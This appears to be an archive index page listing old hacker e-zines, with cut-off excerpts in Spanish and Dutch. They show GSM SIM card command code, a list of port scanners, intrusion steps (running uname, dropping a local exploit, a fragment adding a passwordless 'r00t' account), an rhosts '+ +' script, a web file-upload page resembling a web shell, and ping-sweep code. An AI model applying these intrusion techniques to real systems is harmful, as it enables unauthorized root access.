#U

JJF Hackers Team Journal 6

eZine's profile picture
Published in 
 · 3 days ago
... tdlib.h> #include <ctype.h> #define private private_hack extern "C" { #include <sio.h> #include <sct0.h> #include <sc.h> } #Undef private int timeout; SIO_INFO* si; Byte selectfile[] = { 0xa0, 0xa4, 0x00, 0x00, 0x02 }; Byte gsm_file[] = { 0x7f, 0x20 }; Byte gsm2_file[] = { 0x7f, 0x21 }; Byte get_res[] = { 0xa0, 0xc0, 0x00, 0x00, 0x00 }; Byte verify_pin[] = { 0xa0, 0x20, 0x00, 0x01, 0x08 }; Byte generate_sres[] = { 0xa0, 0x88, 0x00, 0x00, 0x10 }; void init_card(char* devicename, Byte pin[8]) { Byte buffer[32]; int i; SC_ATR * atr; SC_STATE *sc; SLOG *log; si = SIO_Open(devicename); if (si!=NULL) { /* setup for 9600 ...

JJF Hackers Team Journal 5

eZine's profile picture
Published in 
 · 3 days ago
... Aqui Os Pongo Un Listado De Diferentes Scaners Que Os Pueden Ser Utiles. #ident-scan.c #ftp-scan.c #jakal.c #strobe103_tar.gz #scan.sh #statd-scan.c #Udpscan.c El capitulo IV junto con el III consiste en analisis de servidores, en esta entrega vimos como utilizar diferentes comandos del s.o. Unix/Linux para obtener informacion de un servidor remoto. Siendo muy util tanto para un hacker como para un Administrador. Tengo que confesar que no explique todos los comandos que nos pueden ser utiles para un analisis pero si lo explico todo, entonces no tiene gracia y como es bien sabido 'Un hacker se hace a si mismo a base de estudio y pacienc ...

2-9: Metodos de PENEtracion de sistemas

eZine's profile picture
Published in 
 · 1 month ago
... ber quien esta en el sistema, si esta el root nos conviene salir y entrar mas tarde. Si no esta el root hay que sacar el root, entonces hacemos esto: #Uname -a Que nos va a decir el verdadero S.O, luego de tener esto buscamos los exploits para esas versiones y listo ;-) 06.- Exploits locales Una vez dentro de la maquina y sabiendo que sistema operativos es buscamos el exploit remoto una vez que lo tenemos lo tenemos que meter en la maquina de la siguiente manera: #tee cal.sh luego de hacer eso ponemos: #sh cal.sh para ejecutar el exploit: 137$ sh cal.sh Host [local] :local Type a command (max length=75), for example : "echo r00t::0:0:Leshka Zak ...

Hackers 4 Hackers #0B

eZine's profile picture
Published in 
 · 8 months ago
... 7;file_to_create & " echo "ET Lownoise 1996 Colombia" exit fi username=$1 archivo=$2 #CHANGE THIS: #text='text to puit in file to create' #Usr=path of the program users #pineprog=how the pine program appears when u do a w (who) command text='+ +' usr=users pineprog=pine # date echo "- Looking for $1 to log in... just wait" # entrada=0 entro=0 until [ $entro -eq $entrada ] do for nombre in `$usr` do if [ $nombre = $1 ] then entro=1 fi done done .... Oke dit was et weer..misschien niet al te lang maar de volgende keer zal ik er wat meer in zetten en dan wordt et alweer een stukje lastiger ;) iig. stuur me commentaar, kritiek e ...

Hackers 4 Hackers #2

eZine's profile picture
Published in 
 · 8 months ago
... #DateLastModified#</TD> <CFIF TYPE IS "File"> <FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath (DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post"> <TD><INPUT TYPE="submit" VALUE="Delete"></TD> </FORM> </CFIF> </TR> </CFOUTPUT> </TABLE> <CFOUTPUT> <FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat (DirPath)#" ENCTYPE="multipart/form-data" METHOD=POST> <INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR> <INPUT TYPE="submit" VALUE=" Upload "> </FORM> </CFOUTPUT> <FORM AC ...

Hackers 4 Hackers #1

eZine's profile picture
Published in 
 · 8 months ago
... ;#DateLastModified#</TD> <CFIF TYPE IS "File"> <FORM ACTION="#ThisTemplate#?DirPath=#GetDirectoryFromPath(DirPath)#&deletefile=#URLEncodedFormat(Name)#" METHOD="post"> <TD><INPUT TYPE="submit" VALUE="Delete"></TD> </FORM> </CFIF> </TR> </CFOUTPUT> </TABLE> <CFOUTPUT> <FORM ACTION="#ThisTemplate#?DirPath=#URLEncodedFormat(DirPath)#" ENCTYPE="multipart/form-data" METHOD=POST> <INPUT TYPE="File" NAME="uploadfile" SIZE="30"><BR> <INPUT TYPE="submit" VALUE=" Upload "> </FORM> </CFOUTPUT> <CFELSE&g ...

Tyrone v1.0

eZine's profile picture
Published in 
 · 8 months ago
... ailed for dest %s\n", ipaddr); } } sleep(SWEEPDELAY); for (x = 225; x < 255; x++) { getpong(socks[x]); close(socks[x]); } return(0); } config.h.in #Undef HAVE_MALLOC_H #undef HAVE_STRINGS_H #undef HAVE_SYS_TIME_H #undef HAVE_UNISTD_H #undef HAVE_SYS_SELECT_H #undef HAVE_SELECT #undef HAVE_SOCKET #undef WORDS_BIGENDIAN #ifdef WORDS_BIGENDIAN #define __EL_LONG(x) ((((x) >> 24) & 0x000000FF) | \ (((x) >> 8) & 0x0000FF00) | \ (((x) << 8) & 0x00FF0000) | \ (((x) << 24) & 0xFF000000)) #else #define __EL_LONG(x) (x) #endif #ifndef HAVE_SELECT #error Must have 'select' function to work, sorry! #endif # ...
loading
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT